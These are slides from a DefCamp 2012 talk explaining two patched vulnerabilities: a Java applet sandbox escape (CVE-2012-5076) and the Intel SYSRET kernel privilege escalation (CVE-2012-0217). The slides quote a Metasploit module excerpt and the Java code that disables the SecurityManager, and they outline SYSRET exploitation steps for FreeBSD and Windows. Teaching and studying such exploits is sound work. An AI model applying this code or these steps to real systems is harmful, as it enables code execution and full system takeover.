How does a 0day work? - DefCamp 2012

Uploaded on


  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
    Be the first to like this
No Downloads


Total Views
On Slideshare
From Embeds
Number of Embeds



Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

    No notes for slide


  • 1. D E F C AHow does a 0day work? M P Ionut Gabriel Popescu 2 0 “Nytro” 1 2
  • 2. D E F Contents C A M1. Why? P2. CVE-2012-5076 23. CVE-2012-0217 0 14. Questions? 2
  • 3. D Why E to learn how do 0days work? F C A- Not so many interested people M- A very interesting subject P- Unlimited possibilities: Windows/Linux, Java… 2- Highly technical skills 0 1- Deep understanding of “internals” 2- Don’t be a script kiddie – Metasploit?- Not so complicated at all
  • 4. DJava Applet JAX-WS Remote Code E F CVE-2012-5076 C ADisclosure: 16 Oct 2012 MDiscovered by: Unknown POracle patch: October 2012 2Exploited: November 2012 0Java: Version 7 update 7 (7u7) 1Fastly included by: BlackHole, Nuclear Pack, RedKit… 2Metasploit module: juan vazquezAlso known as: Java drive-by
  • 5. D E Browser Java applets can NOT: F C A - Access filesystem - Access system clipboard M - Transfer data from other server P - Load native libraries - Change Security Manager 2 - Create a Class Loader 0 - Read certain system Properties 1 2Source:-
  • 6. Exploit - Metasploit D E F C A M P 2 0 1 2Is this 1337?
  • 7. ### This file is part of the Metasploit Framework and may be subject to D# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and terms of use. E# Frequire msf/core Crequire rex Aclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking M include Msf::Exploit::Remote::HttpServer::HTML P include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :javascript => false }) 2 def initialize( info = {} ) super( update_info( info, 0 Name Description => %q{ => Java Applet JAX-WS Remote Code Execution, 1 This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The 2 vulnerability affects Java version 7u7 and earlier. }, License => MSF_LICENSE, Author => [ Unknown, # Vulnerability Discovery juan vazquez # metasploit module ]...................................................................................
  • 8. D Exploit source E F paths = [ [ "Exploit.class" ], C [ "MyPayload.class" ] A ] M p = regenerate_payload(cli) P jar = p.encoded_jar 2 0Links: 1 - 2 2012-5076/ - 2012-5076/
  • 9. D Cool parts E import; F import; C GenericConstructor genericconstructor = new GenericConstructor(Object.class, A "sun.invoke.anon.AnonymousClassLoader", new Class[0]); Object obj = genericconstructor.create(new Object[] {}); M Method method = ManagedObjectManagerFactory.getMethod(obj.getClass(), "loadClass", new Class[] { byte[].class }); P Class class1 = (Class)method.invoke(obj, new Object[] { //byte_payload buffer }); 2 class1.newInstance(); //System.out.println("SecurityManager:" + System.getSecurityManager()); 0 //class1.getMethod("r", new Class[0]).invoke(class1, new Object[0]); Payload.main(null); 1 //Runtime.getRuntime().exec("calc.exe"); 2 public MyPayload() { AccessController.doPrivileged(this);}public Object run() throws Exception { System.setSecurityManager(null); return null;}
  • 10. Classes and methods D E F- GenericConstructor C- GenericConstructor.create A- sun.invoke.anon.AnonymousClassLoader M- sun.invoke.anon.AnonymousClassLoader.loadClass P- ManagedObjectManagerFactory- ManagedObjectManagerFactory.getMethod 2- Method 0- Method.invoke 1- Class 2- Class.newInstance- Payload.main(null);
  • 11. D How does this 0day work? E F0. Abuse of “GenericConstructor” and “ManagedObjectManagerFactory” C - “GenericConstructor” and “ManagedObjectManagerFactory” – bypass Java security model A M1. Create an instance of “sun.invoke.anon.AnonymousClassLoader” P - “sun.invoke.anon.AnonymousClassLoader” – Restricted, privileged2. Call “loadClass” method from “sun.invoke.anon.AnonymousClassLoader” 2 - “loadClass” – Loads a byte[] stream class 0 13. Call the default constructor of our class, loaded using“AnonymousClassLoader” 2 - Since it is called from a privileged code, it will run privileged, disable Security Manager4. Enjoy - Do whatever you want
  • 12. D E F C A M PQuestions? 2 0 1 2
  • 13. D Intel SYSRET privilege escalation E CVE-2012-0217 F CDiscovered by: Rafal Wojtczuk ADisclosed: 12 April 2012 MPatched: 12 June 2012 PAffected operating systems: - FreeBSD 2 - Windows 7 0 - Linux (NO - CVE-2006-0744 - DOS) 1Just 64 bit systems are vulnerable 2Complicated, trickyOnly Intel x64 processors
  • 14. D Intro x64 E FRegisters extended to 64 bits: RAX, RBX… RIP, RSP C - AH/L = 1B, AX = 2 bytes, EAX = 4 bytes, RAX = 8 bytes A MNew general purpose registers: P - R8, R9, R10, R11, R12, R13, R14, R15New calling convention: 2 - RCX – 1st argument 0 - RDX – 2nd argument 1 - R8 – 3rd argument - R9 – 4th argument 2 Still requires stack to be reservedWindows x64 replaced fs with gs – TIB (Thread Information Block)
  • 15. D Why? E F- Because of “sysret” instruction C- Older system calls – very slow: Interrupts (Ex. int 0x80) A- Interrupts need to use IDT (Interrupt Dispatch Table) M- AMD: syscall/sysret, Intel: sysenter/sysexit (saves RIP in RCX) P- Intel follows AMD 64 standard (not exactly)- Just 48 bits are used (not all 64) = 256 TB of memory available 2- Must use canonical addresses (bits 48-63 == 47) 0- A #GP (General Protection) is raised for non-canonical RIP 1- On exception, exception record is pushed on the stack: error code, 2Saved: RIP, CS, RFLAGS, RSP, SS- Usermode stack is changed to kernel mode stack – “safe” one- If RSP is invalid, #DF (double fault) is raised
  • 16. D Privileges E F C A- Main purpose: full privileges (no limitations) M- Rings: 0, 1, 2, 3 – Because segment descriptor DPL == 2 bits P- Windows and Linux uses just 0 and 3 (compatibility)- Low privilege to high privilege: system calls 2- Change from usermode to kernel mode with syscall and reverse: 0 1. RIP is in usermode, RSP is in usermode, syscall 1 2. RIP - kernel mode, RSP - usermode (replaced during system call), sysret 2
  • 17. D E How does this 0day work? F C- What can happen during sysret: interrupts, exceptions A- Interrupts are not blocked, but are forbidden (one MSR) M- How about exceptions? #GP P- On AMD, #GP is not raised for non-canonical address in RCX (safe) 2- On Intel, if we can have RIP (depends on OS how) to a non-canonicaladdress before sysret, #GP will be raised 0- #GP is raised while CPU is in privileged mode 1- Use RSP to overwrite kernel structure to execute code with ring0 2privileges
  • 18. Operating system specific D EFreeBSD: F 1. Place a “syscall” (0x0f, 0x05) right before a non-canonical address ((1 << 47) - 2) C 2. Set RSP to a calculated value to make sure the exception record pushed on stack will A overwrite #PF (Page Fault)’s “target” offset (raised) with a pointer to our kernelmode payload M 3. #PF will be raised (because gs is usermode) and will execute our payload P 4. Recover overwritten IDTs to avoid a triple fault (machine reboot) 2Windows: 0 1. Create an UMS scheduled thread (EnterUmsSchedulingMode) 1 2. Set RIP and RSP from TEB (Thread Environmet Block) to a non-canonical address 3. Create a new thread that will continuously overwrite return address from #GP stack after it 2 writes it but before it is read (after function call)Enjoy!
  • 19. D E F C A M PQuestions? 2 0 1 2